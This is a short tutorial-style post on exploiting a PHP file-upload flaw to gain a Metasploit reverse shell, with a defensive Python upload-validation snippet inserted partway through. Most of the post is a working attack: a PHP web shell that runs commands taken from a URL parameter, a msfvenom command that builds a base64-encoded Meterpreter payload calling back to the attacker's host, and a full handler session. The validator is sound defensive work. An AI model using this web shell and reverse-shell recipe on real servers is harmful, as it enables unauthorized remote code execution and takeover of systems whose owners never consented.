Metasploit, Reverse shell
2017-12-11 21:48:51
Before we start
Only for educational purposes.
What you need
- Target machine 192.168.0.102 with a php app where you can upload a file
- Kali linux machine 192.168.0.104
Start
To start playing with a reverse shell and Metasploit, you need an app that lets you upload a php file or a php.jpg file :D.
How to test
Try to upload a simple php file. If you run into any problem, play with the extension or the content type.
Test file
Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "lol";
}
?>
Confirm
You have to confirm that the file was uploaded and that you can execute it, for example by visiting the url 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la
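Seen from the server side, the test upload above can be rejected on several independent signals. The following is an added example, not part of the original post: the function name check_upload, the extension deny list and the sample bodies are assumptions constructed for illustration.

```python
import secrets

# Assumed deny list: extensions a PHP-enabled web server may hand to the interpreter.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}
# Allowed final extension -> magic bytes the file content must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def check_upload(filename, content_type, body):
    """Return (stored_name, reasons); stored_name is None when the upload is rejected."""
    reasons = []
    exts = filename.lower().split(".")[1:]   # every extension, not only the last one
    final = exts[-1] if exts else ""
    if final not in ALLOWED:
        reasons.append("final extension not allowed")
    if any(e in EXECUTABLE_EXTS for e in exts):
        reasons.append("executable extension in name")
    if not content_type.lower().startswith("image/"):
        reasons.append("declared type is not an image")
    if final in ALLOWED and not body.startswith(ALLOWED[final]):
        reasons.append("content does not match extension")
    if b"<?php" in body.lower():
        reasons.append("PHP open tag in body")
    if reasons:
        return None, reasons
    # Never reuse the client's name: store under a random name with one known extension.
    return secrets.token_hex(16) + "." + final, reasons

# Constructed samples: the test upload from this page and a minimal JPEG-like body.
PAGE_UPLOAD = ("cmd.php.jpg", "application/x-php",
               b"<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>")
BENIGN_UPLOAD = ("holiday.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    for sample in (PAGE_UPLOAD, BENIGN_UPLOAD):
        print(sample[0], "->", check_upload(*sample))
```

These checks are defence in depth. The control that makes such an upload harmless is a server configuration that never passes files in the uploads directory to the PHP interpreter.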
Metasploit / Kali & Update
I tested this on Metasploit v4.16.21-dev. If your version is outdated, consider updating:
apt update; apt install metasploit-framework
Generate exploit
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg
Important: you have to edit 'msfvenom2.php.jpg' and wrap the payload in
<?php ... ?>
When you are ready, upload this file to the server.
Hammer time
In the msf console, type:
msf >
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
Then visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg
Boom, now you should have a reverse shell. Type something in the msf console like "ls" or "pwd"; for more options, type "shell".